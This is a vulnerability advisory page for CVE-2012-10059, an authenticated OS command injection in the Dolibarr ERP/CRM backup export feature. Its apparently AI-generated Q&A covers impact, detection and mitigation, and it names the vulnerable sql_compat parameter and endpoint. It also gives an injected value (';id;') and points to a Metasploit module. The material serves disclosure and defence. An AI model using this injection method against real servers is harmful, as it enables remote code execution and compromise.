CVE-2012-10059
BaseFortify
Publication date: 2025-08-13
Last updated on: 2025-08-14
Assigner: VulnCheck
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| dolibarr | dolibarr | 3.1.1 |
| dolibarr | dolibarr | 3.2.0 |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-78 | The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
CVE-2012-10059 is a critical post-authentication OS command injection vulnerability in Dolibarr ERP/CRM versions up to 3.1.1 and 3.2.0. It occurs because the export.php script, used for database backups, fails to properly sanitize the sql_compat parameter. This allows an authenticated user to inject arbitrary system commands, which are executed on the server, leading to remote code execution. The vulnerability requires valid credentials and exploits the lack of input validation in the backup export feature. [1, 2, 3, 4, 5]
How can this vulnerability impact me? :
This vulnerability can allow an authenticated attacker to execute arbitrary operating system commands on the affected server with the privileges of the web server user. This can lead to full compromise of the web server and its software, including unauthorized access to sensitive data, modification or deletion of data, disruption of services, and potentially complete control over the underlying system. [1, 3, 4, 5]
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability can be detected by attempting to exploit the command injection in the `sql_compat` parameter of the `export.php` backup feature in Dolibarr ERP/CRM versions <= 3.1.1 and <= 3.2.0. Detection involves authenticating with valid Dolibarr credentials and sending a crafted POST request to `/dolibarr/admin/tools/export.php` with a payload injected into the `sql_compat` parameter, such as appending a semicolon followed by a harmless command (e.g., `;id;`). Monitoring for unexpected command execution or unusual system behavior after such requests can indicate vulnerability. Additionally, the Metasploit module (Resource 2) automates detection by performing login, session handling, and sending the crafted payload to test for command execution. Example commands include using curl or similar tools to send POST requests with the malicious `sql_compat` parameter, or using the Metasploit module targeting this vulnerability. [2, 3, 4, 5]
What immediate steps should I take to mitigate this vulnerability?
Immediate mitigation steps include: 1) Restricting access to the Dolibarr ERP/CRM application to trusted users only, as exploitation requires authentication. 2) Applying vendor-provided patches or updates that fix the input sanitization issue in versions after 3.1.1 and 3.2.0; the vendor provided fixes in the 3.2.x development branch by March 27, 2012, and planned fixes for 3.1.x by June 2012. 3) If patching is not immediately possible, disabling or restricting access to the backup export feature (`export.php`) to prevent exploitation. 4) Monitoring logs for suspicious activity related to the `sql_compat` parameter or unexpected command executions. 5) Using network controls or web application firewalls to detect and block malicious payloads targeting this parameter. [3, 4, 5]